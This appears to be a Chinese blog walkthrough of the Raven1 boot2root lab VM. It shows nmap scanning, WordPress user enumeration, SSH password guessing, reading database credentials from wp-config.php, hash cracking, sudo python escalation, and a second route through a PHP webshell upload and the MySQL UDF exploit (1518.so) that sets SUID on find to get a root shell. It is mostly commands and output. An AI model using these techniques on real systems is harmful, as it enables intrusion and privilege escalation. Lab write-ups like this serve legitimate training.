Raven1渗透实战

2019-01-13 本文已影响0人城市烈人

主机发现与信息收集

arp-scan –l

主机发现

nmap -sS -A -p- 192.168.8.127 –n

nmap全端口扫

Web渗透实战

可以先修改一下hosts：
192.168.8.127 raven.local
进入web端，浓浓的wordpress风格
http://192.168.8.127/wordpress/

wordpress爆用户

小tips：http://192.168.8.127/wordpress/?author=n (n=1,2,3,4……)
http://192.168.8.127/wordpress/?author=1
出现用户： MICHAEL （michael）

wordpress
找到后台 http://raven.local/wordpress/wp-login.php (michael登录失败)

dir爆目录

出现几个可疑的目录：
http://192.168.8.127/vendor
http://192.168.8.127/wordpress/
继续爆这几个关键目录：

dir
看到pop3、phpmail和smtp就能想到应该和邮件有关的，应该是入口

dir2
在wordpress中罕见 http://192.168.8.127/service.html 并右键查看源代码
Get到第一个flag：
flag1{b9bbcb33e11b80be759c4e844862482d}

flag1
继续浏览爆出来的目录
http://192.168.8.127/vendor/PATH 暴露了系统路径，也许之后会用到
/var/www/html/vendor/

path
http://192.168.8.127/vendor/VERSION 暴露了版本信息 5.2.16

version
发现http://192.168.8.127/vendor/SECURITY.md 有提示

提示
从爆出来的这些目录来看，无疑是在提示从phpmailer入手
这时想到了goldeneye中的pop3服务
Nmap扫出来的端口中没有pop3和smtp服务
只能从22端口ssh入手了

ssh登录

尝试登录ssh，用户名就用wordpress暴露的用户 michael，密码尝试用 michael

ssh michael@192.168.8.127

登录成功，果然提示有邮件mail，然而并没有邮件提示

ssh

直接全局搜flag

find / -name "*flag*" 2>/dev/null

find flag

cat /var/www/flag2.txt

flag2
get第二个flag：
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

常规提权

netstat –a

发现主机开启的端口和服务

netstat -a

在靶机的3306端口开启了mysql服务
进入wordpress目录，查看conf配置文件，查看数据库密码

vi wp-config.php

wp-config
root / R@v3nSecurity
直接登录靶机的数据库

mysql -u root –p

mysql

进入wordpress数据中,发现wp_posts表，应该是post数据

select * from wp_posts;

发现了flag3和flag4：

flag3-4
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
查看wordpress数据库中的users表

users
michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
md5解看看

somd5
steven 的密码为 pink84
michael的解不出来
拿去登录一下ssh试试

ssh steven@192.168.8.127

ssh

sudo –l

显示出当前用户的权限，发现可以运行python，直接python提权

sudo python -c 'import pty;pty.spawn("/bin/bash")'

python root

得到第四个flag：

flag4

第二种方法：上大马+mysql udf提权

在michael用户的shell中直接上传大马

scp shell.php michael@192.168.8.127:/var/www/html/shell.php

shell.php
访问该木马 http://192.168.8.127/shell.php

shell.php

mysql passwd
直接可以登录数据库了

mysql udf 提权

searchsploit mysql udf

search mysql udf

先将exp 1518.c 在本地linux上编译完成后，再上传到靶机

gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o –lc

gcc

再将1518.so文件上传到靶机站点的根目录

scp 1518.so michael@192.168.8.127:/var/www/html/1518.so

up 1518.so

提权开始

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.12 sec)

mysql> insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.12 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.03 sec)

mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.11 sec)

mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> quit
Bye
michael@Raven:/var/www/html$ 
michael@Raven:/var/www/html$ touch foo
michael@Raven:/var/www/html$ ls
1518.so      css            fuzhu.py    scss            team.html
about.html   elements.html  img         Security - Doc  tmp
contact.php  fonts          index.html  service.html    vendor
contact.zip  foo            js          shell.php       wordpress
michael@Raven:/var/www/html$ find foo -exec 'whoami' \;
root
michael@Raven:/var/www/html$ find foo -exec '/bin/sh' \;
# whoami
root
# ls 
1518.so      css        fuzhu.py    scss        team.html
about.html   elements.html  img     Security - Doc  tmp
contact.php  fonts      index.html  service.html    vendor
contact.zip  foo        js      shell.php   wordpress
# cd /
# cd root
# ls
flag4.txt
# cat flag4.txt
______                      

| ___ \                     

| |_/ /__ ___   _____ _ __  

|    // _` \ \ / / _ \ '_ \ 

| |\ \ (_| |\ V /  __/ | | |

\_| \_\__,_| \_/ \___|_| |_|

                            
flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought: 

@mccannwj / wjmccann.github.io
#

提权成功

PHPMailer漏洞

本次靶机没有利用到PHPMailer漏洞，但是存在该漏洞
在 Raven2 渗透实战中将详细介绍该漏洞利用过程。

Raven1靶机百度云
链接：https://pan.baidu.com/s/1n3zCh-XOLRO1rpKDY290Zg
提取码：b1qc